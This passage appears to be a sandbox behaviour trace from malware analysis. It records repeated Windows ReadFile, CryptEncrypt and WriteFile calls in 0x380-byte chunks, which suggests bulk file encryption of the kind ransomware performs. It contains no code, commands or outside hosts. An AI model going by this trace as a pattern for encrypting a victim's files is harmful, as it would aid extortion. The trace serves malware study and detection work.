lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.769] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.769] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.899] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.899] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.899] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.899] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.899] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.899] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.900] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.900] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.900] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.900] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.906] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.906] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.906] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.906] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.907] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.907] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.907] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.907] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.907] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.907] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.907] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.907] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.907] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.907] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.907] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.907] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.907] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.908] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.931] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.931] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.931] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.931] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.931] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.931] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.931] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.931] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.931] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.931] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.931] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.931] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.931] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.932] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.932] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.932] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.932] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.932] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.932] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.932] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.932] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.932] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.932] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.932] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.932] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.932] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.932] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.933] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.933] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.933] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.933] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.933] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.933] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.933] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.933] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.933] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.933] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.933] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.933] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.933] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.933] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.933] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.934] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.934] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.934] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.934] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.934] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.934] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.934] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.934] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.934] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.934] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.934] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.934] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.934] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.934] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.935] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.935] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.935] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.935] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.935] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.935] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.935] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.935] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.935] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.935] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, 